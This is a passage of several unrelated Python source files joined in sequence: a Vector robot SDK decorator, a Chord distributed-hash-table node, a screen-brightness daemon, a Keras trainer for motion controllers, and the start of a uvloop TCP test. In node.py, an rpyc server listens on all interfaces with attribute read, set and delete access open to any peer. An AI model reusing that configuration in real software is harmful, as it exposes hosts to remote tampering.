This unblocks the caller of the wrapped function and allows them to continue running while the messages are being processed. .. code-block:: python import anki_vector class MyComponent(anki_vector.util.Component): @connection._on_connection_thread() async def on_connection_thread(self): # Do work on the connection thread :param log_messaging: True if the log output should include the entire message or just the size. Recommended for large binary return values. :param requires_control: True if the function should wait until behavior control is granted before executing. :param is_cancellable_behavior: True if the behavior can be cancelled before it has completed. :returns: A decorator which has 3 possible returns based on context: the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`~anki_vector.robot.Robot`, when the robot is an :class:`~anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively. """ def _on_connection_thread_decorator(func: Coroutine) -> Any: """A decorator which specifies a function to be executed on the connection thread :params func: The function to be decorated :returns: There are 3 possible returns based on context: the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`anki_vector.robot.Robot`, when the robot is an :class:`anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively. """ if not asyncio.iscoroutinefunction(func): raise VectorAsyncException("\n\nCannot define non-coroutine function '{}' to run on connection thread.\n" "Make sure the function is defined using 'async def'.".format(func.__name__ if hasattr(func, "__name__") else func)) @functools.wraps(func) async def log_handler(conn: Connection, func: Coroutine, logger: logging.Logger, *args: List[Any], **kwargs: Dict[str, Any]) -> Coroutine: """Wrap the provided coroutine to better express exceptions as specific :class:`anki_vector.exceptions.VectorException`s, and adds logging to incoming (from the robot) and outgoing (to the robot) messages. """ result = None # TODO: only have the request wait for control if we're not done. If done raise an exception. control = conn.control_granted_event if requires_control and not control.is_set(): if not conn.requires_behavior_control: raise VectorControlException(func.__name__) logger.info(f"Delaying {func.__name__} until behavior control is granted") await asyncio.wait([conn.control_granted_event.wait()], timeout=10) message = args[1:] outgoing = message if log_messaging else "size = {} bytes".format(sys.getsizeof(message)) logger.debug(f'Outgoing {func.__name__}: {outgoing}') try: result = await func(*args, **kwargs) except grpc.RpcError as rpc_error: raise connection_error(rpc_error) from rpc_error incoming = str(result).strip() if log_messaging else "size = {} bytes".format(sys.getsizeof(result)) logger.debug(f'Incoming {func.__name__}: {type(result).__name__} {incoming}') return result @functools.wraps(func) def result(*args: List[Any], **kwargs: Dict[str, Any]) -> Any: """The function that is the result of the decorator. Provides a wrapped function. 
:param _return_future: A hidden parameter which allows the wrapped function to explicitly return a future (default for AsyncRobot) or not (default for Robot). :returns: Based on context this can return the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`anki_vector.robot.Robot`, when the robot is an :class:`anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively.""" self = args[0] # Get the self reference from the function call # if the call supplies a _return_future parameter then override force_async with that. _return_future = kwargs.pop('_return_future', self.force_async) behavior_id = None if is_cancellable_behavior: behavior_id = self._get_next_behavior_id() kwargs['_behavior_id'] = behavior_id wrapped_coroutine = log_handler(self.conn, func, self.logger, *args, **kwargs) if threading.current_thread() == self.conn.thread: if self.conn.loop.is_running(): return asyncio.ensure_future(wrapped_coroutine, loop=self.conn.loop) raise VectorAsyncException("\n\nThe connection thread loop is not running, but a " "function '{}' is being invoked on that thread.\n".format(func.__name__ if hasattr(func, "__name__") else func)) future = asyncio.run_coroutine_threadsafe(wrapped_coroutine, self.conn.loop) if is_cancellable_behavior: def user_cancelled(fut): if behavior_id is None: return if fut.cancelled(): self._abort(behavior_id) future.add_done_callback(user_cancelled) if requires_control: self.conn.active_commands.append(future) def clear_when_done(fut): if fut in self.conn.active_commands: self.conn.active_commands.remove(fut) future.add_done_callback(clear_when_done) if _return_future: return future try: return future.result() except futures.CancelledError: self.logger.warning(f"{func.__name__} cancelled because behavior control was lost") return None return result return _on_connection_thread_decorator
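# --- Illustrative sketch (not part of the module above) ---
# Switching between the behavior-control levels documented in this module: hold
# RESERVE_CONTROL around a pause so Vector suppresses idle behaviors without the SDK
# actively driving, then re-acquire DEFAULT_PRIORITY before issuing more commands.
# Robot name/IP/cert come from the usual SDK configuration and are not shown here.

import time
import anki_vector
from anki_vector.connection import ControlPriorityLevel

with anki_vector.Robot(behavior_control_level=ControlPriorityLevel.DEFAULT_PRIORITY) as robot:
    robot.anim.play_animation_trigger('GreetAfterLongTime')

    # keep idle behaviors quiet while we wait, but stop driving the robot ourselves
    robot.conn.request_control(behavior_control_level=ControlPriorityLevel.RESERVE_CONTROL)
    time.sleep(5)

    # take normal control again for the next command
    robot.conn.request_control(behavior_control_level=ControlPriorityLevel.DEFAULT_PRIORITY)
    robot.anim.play_animation_trigger('GreetAfterLongTime')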
node.py
#!/bin/python import sys import random import math import threading import rpyc from chordsite.env import * from chordsite.address import inrange from chordsite.finger_entry import FingerEntry # from rpc_server import RPC # from rpc_client import RPCClient from rpyc.utils.server import ThreadedServer # class representing a local peer # class Node(object): class Node(rpyc.Service): def __init__(self, local_address, remote_address=None): self._address = local_address # a hash map of rpc client to remote nodes, key is ip, value is the client self.remote_clients = {} # get identifier _id = self._address.__hash__() % NUM_SLOTS """ avoid collision TODO: find through remote_node to see if other node has the same id """ # while remote.getRemoteNodeByID(_id) is not None: if remote_address is not None: while self.get_remote_node(remote_address).node_id() == _id: _id = (_id + 1) % NUM_SLOTS self._id = _id # initialize successor self._successor = None # list of successors is to prevent lookup failure self._successors = [None for x in range(M_BIT)] self._predecessor_id = _id self._successor_id = _id # initialize predecessor self._predecessor = None # finger table self._finger = None self._leave = False # means that node in on the ring # TODO: to be removed when using RPC, DEPRECATED # self._remote.addToNetwork(self._id, self) # join the DHT self.join(remote_address) # in case any node depatures # self.check_predecessor() # initilize RPC server # thread = ThreadedServer(RPC(self), hostname='0.0.0.0', port=18861, protocol_config={ # 'allow_all_attrs': True # }) # self._thread = threading.Thread(target=thread.start) # self._thread.start() # print('RPC server started...') # initilize RPC server thread = ThreadedServer(self, hostname='0.0.0.0', port=18861, protocol_config={ 'allow_all_attrs': True, 'allow_setattr': True, 'allow_delattr': True, }) self._thread = threading.Thread(target=thread.start) self._thread.start() print('RPC server started...') def address(self): return self._address def exposed_address(self): return self._address # node leave def leave(self): self._leave = True # exit(0) # logging function def log(self, info): f = open("/tmp/chord.log", "a+") f.write(str(self.node_id()) + " : " + info + "\n") f.close() print(str(self.node_id()) + " : " + info) # return true if node does not leave, i.e. still in the Chord ring def ping(self): if self._leave: return False return True def exposed_ping(self): if self._leave: return False return True def get_remote_node(self, ip): if ip not in self.remote_clients: # self.remote_clients[ip] = RPCClient(ip) self.remote_clients[ip] = rpyc.connect(ip, 18861) return self.remote_clients[ip].root """ find the exact successor by comparing the hash(n), can be regarded as a lookup 1. initialize the predecessor and the finger table 2. notify other nodes to update their predecessors and finger tables 3. the new node takes over its responsible keys from its successor. 
""" def join(self, remote_address=None): # initialize finger table self._finger = [None for x in range(M_BIT)] if remote_address: # 1) add to a node `n`, n.find_successor(`to_be_added`) start = (self.node_id() + (2 ** 0)) % NUM_SLOTS # TODO: replace _remote.getRemoteNode method, start a RPC client instead # remote_node = self._remote.getRemoteNode(remote_address) # find rpc client to remote node remote_node = self.get_remote_node(remote_address) print('remote_node: ', remote_node) # TODO: RPC call find_successor, calling RPC server function # successor = remote_node.find_successor(start) # find remote node by Chord ID # successor = remote_node.find_succ(start) successor = remote_node.find_successor(start) self._finger[0] = FingerEntry(start, successor) # 2) point `to_be_added`’s `successor` to the node found self._successor = successor # 3) copy keys less than `ID(to_be_added)` from the `successor` # self._predecessor = successor._predecessor self._predecessor = successor.predecessor() # update its successor's predecessor # self._successor._predecessor = self self._successor.set_predecessor(self) else: # current node is the first node on the Chord ring self._successor = self # self._finger[0] = FingerEntry(self.id(), self) self._predecessor = self # add other entries in finger table self.init_finger(remote_address) self.fix_finger() self.update_successors() # # 4) call `to_be_added`.stabilize() to update the nodes between `to_be_added` and its predecessor self.stabilize() self.log("joined") # --------------------------------------------- """ first node on circle that succeeds (n + 2^k−1) mod 2m, 1 <= k <= m i-th entry means the 2^i far-away node from the current node """ def init_finger(self, remote_address=None): if remote_address: # get the arbitrary node in which the target node want to join # TODO: _remote.getRemoteNode _remote with RPC client # remote_node = self._remote.getRemoteNode(remote_address) remote_node = self.get_remote_node(remote_address) # first find its successor, i.e. 
the first entry in its finger table successor = self.successor() if successor is None: # TODO: replace with RPC call find_succ successor = remote_node.find_successor(self.node_id()) self._successor = successor # initialize the rest of its finger table for x in range(1, M_BIT): start_id = (self.node_id() + 2 ** x) % NUM_SLOTS self._finger[x] = FingerEntry(start_id, None) # find the corresponding nodes that are supposed to be in the finger table for x in range(0, M_BIT - 1): start_id = self._finger[x + 1].start if inrange(start_id, self.node_id(), self._finger[x].node.node_id()): # if inrange, no RPC call needed, assign locally self._finger[x + 1].node = self._finger[x].node else: """ need to call find successor leveraging finger table for `self.find_successor`, if its the first node """ successor = self.find_successor(start_id) self._finger[x + 1] = FingerEntry(start_id, successor) else: # n is the only node in the network for x in range(0, M_BIT): start_id = math.floor((self.node_id() + 2 ** x) % NUM_SLOTS) self._finger[x] = FingerEntry(start_id, self) self.print_finger('init_finger') # --------------------------------------------- # called periodically # back-up successor list, a M_BIT-long successor link list def update_successors(self): if self._leave: return successor = self._successor for x in range(M_BIT): if successor is not None: self._successors[x] = successor successor = successor.successor() threading.Timer(2, self.update_successors).start() def node_id(self, offset=0): return self._id def exposed_node_id(self, offset=0): return self._id # for successor other than the node itself, `successor` returns the Netrefs instance of a remote node def successor(self): successor = self._successor print('current successor', self._successor.ping()) if not successor.ping(): for x in range(1, len(self._successors)): if self._successors[x].ping(): successor = self._successors[x] print('current successor', successor.node_id()) return successor def exposed_successor(self): successor = self._successor print('current successor', self._successor.ping()) if not successor.ping(): for x in range(1, len(self._successors)): if self._successors[x].ping(): successor = self._successors[x] print('current successor', successor.node_id()) return successor # for predecessor other than the node itself, `predecessor` returns the Netrefs instance of a remote node def predecessor(self): return self._predecessor def exposed_predecessor(self): return self._predecessor def get_succ_pred_id(self): print('get_succ_pred_id: ', self._successor.node_id(), self._predecessor_id) return (self._successor.node_id(), self._predecessor_id) def exposed_get_succ_pred_id(self): print('exposed_get_succ_pred_id: ', self._successor.node_id(), self._predecessor_id) return (self._successor.node_id(), self._predecessor_id) # set predecessor def set_predecessor(self, node): print('---------set_predecessor------------') print(node.node_id()) self._predecessor_id = node.node_id() # TODO: one thing to note is this may return a Netrefs instance of a remote node, rather than a Node instance def find_successor(self, id): print('---------find_successor--------------') self.log("find_successor of {}".format(id)) # if self._predecessor exists, and _predecessor.id < id < self.id, the successor is current node pre_id = self._predecessor.node_id() self_id = self.node_id() if self._predecessor and inrange(id, pre_id, self_id): return self # TODO: replace `find_predecessor` and `successor` with RPC call return self.find_predecessor(id).successor() def 
find_predecessor(self, id): lg = "find_predecessor of: {}".format(id) self.log(lg) node = self # when the ring only has one node, node.id is the same as node.successor.id, # if we are alone in the ring, we are the pred(id) if node.node_id() == node.successor().node_id(): return node while not inrange(id, node.node_id(), node.successor().node_id() + 1): node = node._closest_preceding_node(id) return node def _closest_preceding_node(self, id): # from m down to 1 for x in reversed(range(len(self._finger))): entry = self._finger[x] # TODO: replace id method with RPC call, maybe a new method to replace _closest_preceding_node if entry != None and entry.node != None and inrange(entry.node.node_id(), self.node_id(), id): return entry.node return self # used for network visualization application def get_finger(self): finger = [] for x in range(len(self._finger)): if self._finger[x] is not None: finger.append( {'start': self._finger[x].start, 'node': self._finger[x].node.node_id()}) else: finger.append({}) return str(finger) # used for network visualization application def exposed_get_finger(self): return self.get_finger() def update_finger(self, successor, index): if self._finger[index] is not None: if inrange(successor.node_id(), self.node_id() - 1, self._finger[index].node.node_id()): self._finger[index].node = successor # TODO: replace `update_finger` with a RPC call self._predecessor.update_finger(successor, index) # print('finger table of ', self.id(), 'start: ', self._finger[x].start, 'node', self._finger[x].node.id()) # DEPRECATED def update_others(self): for x in range(1, M_BIT + 1): # find last node whose i-th finger might be current node start = (self.node_id() - 2 ** (x - 1)) % NUM_SLOTS """ 2 cases for such invocations: - returns a Node instance when only one node in the network - returns a Netref instance of a remote node """ pre = self.find_predecessor(start) # if only one node on the ring, no need to update others if pre.node_id() == self.node_id(): continue pre.update_finger(self, x) # called periodically # clear the node’s predecessor pointer if n.predecessor is alive, or has failed def check_predecessor(self): if self._leave: return # self.log('check_predecessor, predecessor of {}: , isAlive: {}'.format(self.predecessor().id(), self.predecessor().ping())) pre = self.predecessor() if pre is not None and not pre.ping(): self._predecessor = None threading.Timer(2, self.check_predecessor).start() # called periodically # check its own successor if any new node added between its previous successor def stabilize(self): if self._leave: return # prevent successor failure successor = self.successor() # pre = successor._predecessor pre = successor.predecessor() print('-----------stabilize--------------') pre_id = pre.node_id() self_id = self.node_id() succ_id = successor.node_id() if pre is not None and inrange(pre_id, self_id, succ_id): self.log('stabilize calls update_successor') self.update_successor(pre) print('stabilize successor: ', successor.notify) successor.notify(self) self.print_finger('stabilize') threading.Timer(2, self.stabilize).start() # RPC call # receive request that some node thinks it might be our predecessor def notify(self, pre): # check if pre is the new predecessor if (self._predecessor is None or inrange(pre.node_id(), self._predecessor.node_id(), self.node_id())): self._predecessor = pre def exposed_notify(self, pre): # check if pre is the new predecessor if (self._predecessor is None or inrange(pre.node_id(), self._predecessor.node_id(), self.node_id())): 
self._predecessor = pre # called periodically # randomly update finger table def fix_finger(self): if self._leave: return self.log('fix_finger') index = random.randrange(M_BIT - 1) + 1 self._finger[index].node = self.find_successor( self._finger[index].start) # self.print_finger('fix_finger') threading.Timer(2, self.fix_finger).start() # update both first entry in finger table and _successor def update_successor(self, new_s): self._successor = new_s self._finger[0].node = new_s def print_finger(self, mod='default'): for x in range(0, M_BIT): if self._finger[x] is not None: self.log('{}: finger table of {}, start: {}, node: {}'.format( mod, self.node_id(), self._finger[x].start, self._finger[x].node.node_id())) # if __name__ == "__main__": # thread = ThreadedServer(RPC(self), hostname='0.0.0.0', port=18861, protocol_config={ # 'allow_all_attrs': True # }) # self._thread = threading.Thread(target=thread.start) # self._thread.start() # print('RPC server started...')
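# --- Standalone illustration (not part of the Node class above) ---
# Finger-table layout in Chord: entry k of node n starts at (n + 2**k) mod 2**m, which
# is exactly what init_finger computes as (self.node_id() + 2 ** x) % NUM_SLOTS. The
# small M_BIT below is only for the example; the real values come from chordsite.env.

EXAMPLE_M_BIT = 4
EXAMPLE_NUM_SLOTS = 2 ** EXAMPLE_M_BIT          # a 16-slot identifier ring

def finger_starts(node_id):
    return [(node_id + 2 ** k) % EXAMPLE_NUM_SLOTS for k in range(EXAMPLE_M_BIT)]

print(finger_starts(11))                        # -> [12, 13, 15, 3]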
daemon.py
from autobrightness import brightness
import keyboard
import time
import Xlib.display
from threading import Thread


class Daemon:
    """
    Background service

    Parameters:
        settings: config object
        lang: gettext object
    """

    def __init__(self, settings, lang):
        global _
        _ = lang.gettext
        print(_("Starting daemon..."))
        self.brightness = brightness.Brightness(settings, lang)
        self.interval = settings.interval
        self.shortcut = settings.shortcut
        self.fullscreen = False
        if settings.fullscreen == 1:
            self.fullscreen = True
        self.startup = False
        if settings.startup == 1:
            self.startup = True

    def shortcutEvent(self, e=None):
        """
        Shortcut keypress event
        """
        print(_("Shortcut key used."))
        self.setBrightness()

    def addShortcut(self, shortcut):
        """
        Add shortcut to keyboard event

        Parameters:
            shortcut (str|int): key combination or scancode
        """
        if isinstance(shortcut, str):
            keyboard.add_hotkey(shortcut, self.shortcutEvent)
        else:
            keyboard.on_press_key(shortcut, self.shortcutEvent)

    def setBrightness(self):
        """
        Calculate and set screen brightness
        """
        self.brightness.set(self.brightness.calculate())

    def start(self):
        """
        Start the daemon
        """
        if self.fullscreen:
            fullscreenThread = Thread(target=self._fullScreenCheck)
            fullscreenThread.start()
        if self.startup:
            self.setBrightness()
        if self.shortcut is not None:
            self.addShortcut(self.shortcut)
        while True:
            if self.interval > 0:
                time.sleep(self.interval)
                self.setBrightness()
            elif self.shortcut is not None:
                time.sleep(1)
            else:
                print(_("No interval nor shortcut selected."))
                break

    def _fullscreenCount(self):
        """
        Returns fullscreen window count
        https://stackoverflow.com/a/1360522
        """
        screen = Xlib.display.Display().screen()
        num_of_fs = 0
        for window in screen.root.query_tree()._data['children']:
            try:
                width = window.get_geometry()._data["width"]
                height = window.get_geometry()._data["height"]
            except Exception:
                width = 0
                height = 0
            if width == screen.width_in_pixels and height == screen.height_in_pixels:
                num_of_fs += 1
        return num_of_fs

    def _fullScreenCheck(self):
        print(_("Full screen check activated."))
        fullscreenCount = self._fullscreenCount()
        fullscreenMode = False
        while True:
            if not fullscreenMode:
                oldBrightness = self.brightness.screen.getBrightness()
            # an increase in the fullscreen window count means a fullscreen window is on screen
            if self._fullscreenCount() > fullscreenCount and self.brightness.screen.getBrightness() != self.brightness.screen.maxBrightness:
                print(_("Detected full screen mode"))
                fullscreenMode = True
                self.brightness.set(self.brightness.screen.maxBrightness)
            # go back to the old brightness value
            if self._fullscreenCount() == fullscreenCount and fullscreenMode:
                print(_("Exiting from full screen mode"))
                fullscreenMode = False
                self.brightness.set(oldBrightness)
            time.sleep(.5)
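# --- Hypothetical wiring sketch (not from the autobrightness package) ---
# A stand-in settings object exposing the attributes Daemon reads here (interval,
# shortcut, fullscreen, startup) plus a gettext fallback for `lang`. The real
# brightness.Brightness may require further settings fields, so this only illustrates
# the constructor contract of Daemon, not a working configuration.

import gettext
from types import SimpleNamespace

settings = SimpleNamespace(interval=60, shortcut=None, fullscreen=1, startup=1)
lang = gettext.NullTranslations()   # provides .gettext like the real translation object

daemon = Daemon(settings, lang)
daemon.start()                      # blocks; recalculates brightness every `interval` seconds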
MCHandleTrainer.py
from tkinter import * from tkinter import messagebox from keras.layers import Dense from keras.models import Sequential, load_model import tensorflow as tf import serial import serial.tools.list_ports import threading from PIL import Image, ImageDraw, ImageTk import numpy as np import time import multiprocessing import queue from host.BaseComm import BaseComm from host.ui_logger import UiLogger class MCHandleTrainer: ACTION_NONE = '无动作' ACTION_FORWARD = '前进' ACTION_JUMP = '起跳' ACTION_DOWN = '下降' ACTION_HIT = '打击' ACTION_PUT = '放置' ACTIONS = [ACTION_NONE, ACTION_FORWARD, ACTION_JUMP, ACTION_DOWN, ACTION_HIT, ACTION_PUT] def __init__(self, root=None): self.init_top = Tk() self.port_left = 'COM4' self.port_right = 'COM5' self.init_bps = StringVar() self.init_bps.set('115200') self.init_com_left = StringVar() self.init_com_left.set(self.port_left) self.init_com_right = StringVar() self.init_com_right.set(self.port_right) self.init_communication() self.bps = 115200 self.comm = None self.n = 512 self.select = 24 self.frames = [[0 for i in range(12)] for j in range(self.n)] self.raw = [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] for j in range(self.n)] # 建立网络 self.model_file = 'mc_actions.h5' # 建立网络的过程放在线程2 # self.model = model # print(self.model.get_config()) self.comm_left = BaseComm(self.init_com_left.get(), self.bps) self.comm_right = BaseComm(self.init_com_right.get(), self.bps) self.root = root if self.root is None: self.root = Tk() self.root.title("MC手柄训练器") self.panel = Label(self.root) self.panel.pack(side=TOP, expand=1, fill=X) frame = Frame(self.root) Button(frame, text='切换模式', command=self.predict_mode).grid(row=1, column=1, sticky=W + E) Button(frame, text='前进', command=self.action_forward).grid(row=1, column=2, sticky=W + E) Button(frame, text='上跳', command=self.action_jump).grid(row=1, column=3, sticky=W + E) Button(frame, text='下降', command=self.action_down).grid(row=1, column=4, sticky=W + E) Button(frame, text='打击', command=self.action_hit).grid(row=1, column=5, sticky=W + E) Button(frame, text='放置', command=self.action_put).grid(row=1, column=6, sticky=W + E) Button(frame, text='无动作', command=self.action_none).grid(row=1, column=7, sticky=W + E) Button(frame, text='保存模型', command=self.save_model).grid(row=1, column=8, sticky=W + E) Label(frame, text='正在训练:').grid(row=1, column=9, sticky=W + E) self.var_training = StringVar() self.var_training.set('...') Label(frame, textvariable=self.var_training).grid(row=1, column=10, sticky=W + E) frame.pack(side=BOTTOM, expand=1, fill=X) self.logger_test = UiLogger(self.root, title='程序日志', simplify=False, height=10) self.logger_test.logger().pack(side=BOTTOM, expand=1, fill=X) self.lock = threading.Lock() self.training = self.ACTION_NONE self.will_save_model = False self.train_mode = True self.t1 = 0 self.t2 = 0 t = threading.Thread(target=self.read_thread) t.setDaemon(True) t.start() t = threading.Thread(target=self.parse_thread) t.setDaemon(True) t.start() def predict_mode(self): if self.train_mode is True: self.train_mode = False self.logger_test.push(UiLogger.Item(UiLogger.LEVEL_WARNING, 'switch', '切换到预测模式')) self.t2 = 0 else: self.train_mode = True self.logger_test.push(UiLogger.Item(UiLogger.LEVEL_WARNING, 'switch', '切换到训练模式')) self.t2 = 0 def action_forward(self): if self.training == self.ACTION_FORWARD: self.training = self.ACTION_NONE else: self.training = self.ACTION_FORWARD def action_jump(self): if self.training == self.ACTION_JUMP: self.training = self.ACTION_NONE else: self.training = self.ACTION_JUMP def 
action_down(self): if self.training == self.ACTION_DOWN: self.training = self.ACTION_NONE else: self.training = self.ACTION_DOWN def action_hit(self): if self.training == self.ACTION_HIT: self.training = self.ACTION_NONE else: self.training = self.ACTION_HIT def action_put(self): if self.training == self.ACTION_PUT: self.training = self.ACTION_NONE else: self.training = self.ACTION_PUT def action_none(self): self.training = self.ACTION_NONE def save_model(self): self.will_save_model = True def init_communication(self): top = self.init_top frame = LabelFrame(top, text="连接设置") Label(frame, text="左手柄").grid(row=1, column=1) Entry(frame, textvariable=self.init_com_left).grid(row=1, column=2) Label(frame, text="右手柄").grid(row=2, column=1) Entry(frame, textvariable=self.init_com_right).grid(row=2, column=2) Label(frame, text="波特率").grid(row=3, column=1) Entry(frame, textvariable=self.init_bps).grid(row=3, column=2) frame.grid(row=1, columnspan=3, column=1) Button(top, text="测试", command=self.init_communication_test).grid(row=2, column=1, sticky=W+E) Button(top, text="刷新", command=self.init_communication_refresh).grid(row=2, column=2, sticky=W+E) Button(top, text="确定", command=self.init_communication_ok).grid(row=2, column=3, sticky=W+E) top.mainloop() def init_communication_ok(self): try: bps = int(self.init_bps.get()) except ValueError: messagebox.showerror("错误", '数值错误!') return self.bps = bps self.port_left = self.init_com_left.get() self.port_right = self.init_com_right.get() if self.init_communication_test(show=False) is False: messagebox.showerror("错误", '手柄测试不通过!') return self.init_top.destroy() def mainloop(self): self.root.mainloop() def init_communication_test(self, show=True): try: bps = int(self.init_bps.get()) except ValueError: messagebox.showerror("错误", '数值错误!') return res = True print('测试左手柄') comm = BaseComm(self.init_com_left.get(), bps) if not comm.test(): if show is True: messagebox.showerror("错误", '测试左手柄失败') res = False comm.close() print('测试右手柄') comm = BaseComm(self.init_com_right.get(), bps) if not comm.test(): if show is True: messagebox.showerror("错误", '测试右手柄失败') res = False comm.close() return res def init_communication_refresh(self): pass # 单个手柄数据读取 def read_data(self, comm: BaseComm, q: queue.Queue): q.put(comm.read1epoch()) # 第二个线程,负责读取 def read_thread(self): while True: time.sleep(0.01) q_left = queue.Queue() q_right = queue.Queue() # data_left = self.comm_left.read1epoch() # data_right = self.comm_right.read1epoch() thread_left = threading.Thread(target=self.read_data, args=(self.comm_left, q_left)) thread_right = threading.Thread(target=self.read_data, args=(self.comm_right, q_right)) thread_left.setDaemon(True) thread_right.setDaemon(True) thread_left.start() thread_right.start() thread_left.join(5) thread_right.join(5) if q_left.empty() or q_right.empty(): print('WARING: 数据读取失败!') continue data_left = q_left.get() data_right = q_right.get() self.lock.acquire() self.raw.append([data_left, data_right]) if len(self.raw) > self.n: self.raw = self.raw[1:-1] self.lock.release() # frames添加数据 ann = data_left[0:6] ann.extend(data_right[0:6]) self.lock.acquire() self.frames.append(ann) if len(self.frames) > self.n: self.frames = self.frames[1:-1] self.lock.release() # print('ANN DATA:', ann) def parse_thread(self): # 建模 try: model = load_model(self.model_file) except OSError: print("Can't find", self.model_file) model = Sequential() model.add(Dense(self.select * 12, activation='tanh', input_dim=self.select * 12)) model.add(Dense(self.select * 24, activation='tanh')) 
model.add(Dense(self.select * 32, activation='tanh')) model.add(Dense(self.select * 48, activation='tanh')) model.add(Dense(self.select * 32, activation='tanh')) model.add(Dense(self.select * 24, activation='tanh')) model.add(Dense(self.select * 12, activation='tanh')) model.add(Dense(self.select, activation='tanh')) model.add(Dense(6, activation='softmax')) model.compile(loss='binary_crossentropy', optimizer='adam') start = time.time() while True: self.var_training.set(self.training) # 只需要MPU数据 self.lock.acquire() data_left = self.raw[-1][0][:6] data_right = self.raw[-1][1][:6] self.lock.release() # data_left = self.comm_left.read1epoch()[:6] # data_right = self.comm_right.read1epoch()[:6] # print(data) data = data_left data.extend(data_right) # print(data) # self.lock.acquire() # self.frames.append(data) # if len(self.frames) > self.n: # self.frames = self.frames[1:-1] # self.lock.release() if self.t1 == 5: im = self.draw() imp = ImageTk.PhotoImage(image=im) self.panel.configure(image=imp) self.panel.image = imp self.t1 = 0 self.t1 += 1 # 开始训练 if self.t2 == 5 and self.train_mode is True: self.lock.acquire() x = np.array(self.frames[len(self.frames) - self.select:]) self.lock.release() x = x.reshape((1, x.size)) # print('X shape:', x.shape) one = [0 for i in range(6)] one[self.ACTIONS.index(self.training)] = 1 y = np.array(one) y = y.reshape((1, 6)) # print('Y shape:', y.shape) self.t2 = 0 res = model.train_on_batch(x=x, y=y) # print('train:', res) self.logger_test.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'training', '%s' % res)) self.t2 += 1 if self.will_save_model is True: print('保存模型...') self.lock.acquire() model.save(self.model_file) self.will_save_model = False self.lock.release() # 预测模式 if self.t2 == 5 and self.train_mode is False: self.t2 = 0 self.lock.acquire() x = np.array(self.frames[len(self.frames) - self.select:]) self.lock.release() x = x.reshape((1, x.size)) # print('X shape:', x.shape) # res = model.train_on_batch(x=x, y=y) predict = model.predict(x=x)[0] predict = predict.tolist() res = predict.index(max(predict)) res = self.ACTIONS[res] # print('predict:', res) self.logger_test.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'predict %.2f' % (time.time() - start), '%s' % res)) def draw(self): width = 1 height = 32 colors = [ 'red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple', 'red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple', ] size = (width * self.n, height * 6) im = Image.new("RGB", size, color='white') draw = ImageDraw.Draw(im) for i in range(self.n - 2): for j in range(12): draw.line((width * i, self.frames[i][j] + size[1] / 2, width * (i + 1), self.frames[i + 1][j] + size[1] / 2), fill=colors[j]) sx = size[0] - width * self.select draw.line((sx, 0, sx, size[1]), fill='red') return im if __name__ == '__main__': multiprocessing.freeze_support() _trainer = MCHandleTrainer() # _trainer.init_communication() _trainer.mainloop()
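parse_thread trains on a sliding window of the most recent `select` frames, flattened into a single row, against a one-hot label for the currently selected action. The snippet below isolates that window-to-(x, y) step with dummy sensor data; the helper name and constants are illustrative, only the label ordering and reshape follow the trainer code above.

import numpy as np

ACTIONS = ['无动作', '前进', '起跳', '下降', '打击', '放置']  # same ordering as the trainer
SELECT = 24          # window length used above
N_CHANNELS = 12      # 6 MPU values per handle, two handles

def window_to_batch(frames, current_action):
    """Flatten the last SELECT frames into one training row plus a one-hot label."""
    x = np.array(frames[-SELECT:], dtype=float).reshape(1, SELECT * N_CHANNELS)
    y = np.zeros((1, len(ACTIONS)))
    y[0, ACTIONS.index(current_action)] = 1.0
    return x, y

# Example with dummy frames, suitable for model.train_on_batch(x=x, y=y):
frames = [[0.0] * N_CHANNELS for _ in range(512)]
x, y = window_to_batch(frames, '前进')
assert x.shape == (1, SELECT * N_CHANNELS) and y.shape == (1, len(ACTIONS))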
test_tcp.py
import asyncio import asyncio.sslproto import gc import os import select import socket import unittest.mock import uvloop import ssl import sys import threading import time import weakref from OpenSSL import SSL as openssl_ssl from uvloop import _testbase as tb class MyBaseProto(asyncio.Protocol): connected = None done = None def __init__(self, loop=None): self.transport = None self.state = 'INITIAL' self.nbytes = 0 if loop is not None: self.connected = asyncio.Future(loop=loop) self.done = asyncio.Future(loop=loop) def connection_made(self, transport): self.transport = transport assert self.state == 'INITIAL', self.state self.state = 'CONNECTED' if self.connected: self.connected.set_result(None) def data_received(self, data): assert self.state == 'CONNECTED', self.state self.nbytes += len(data) def eof_received(self): assert self.state == 'CONNECTED', self.state self.state = 'EOF' def connection_lost(self, exc): assert self.state in ('CONNECTED', 'EOF'), self.state self.state = 'CLOSED' if self.done: self.done.set_result(None) class _TestTCP: def test_create_server_1(self): if self.is_asyncio_loop() and sys.version_info[:3] == (3, 5, 2): # See https://github.com/python/asyncio/pull/366 for details. raise unittest.SkipTest() CNT = 0 # number of clients that were successful TOTAL_CNT = 25 # total number of clients that test will create TIMEOUT = 5.0 # timeout for this test A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(len(A_DATA)) self.assertEqual(data, A_DATA) writer.write(b'OK') data = await reader.readexactly(len(B_DATA)) self.assertEqual(data, B_DATA) writer.writelines([b'S', b'P']) writer.write(bytearray(b'A')) writer.write(memoryview(b'M')) if self.implementation == 'uvloop': tr = writer.transport sock = tr.get_extra_info('socket') self.assertTrue( sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)) await writer.drain() writer.close() CNT += 1 async def test_client(addr): sock = socket.socket() with sock: sock.setblocking(False) await self.loop.sock_connect(sock, addr) await self.loop.sock_sendall(sock, A_DATA) buf = b'' while len(buf) != 2: buf += await self.loop.sock_recv(sock, 1) self.assertEqual(buf, b'OK') await self.loop.sock_sendall(sock, B_DATA) buf = b'' while len(buf) != 4: buf += await self.loop.sock_recv(sock, 1) self.assertEqual(buf, b'SPAM') self.assertEqual(sock.fileno(), -1) 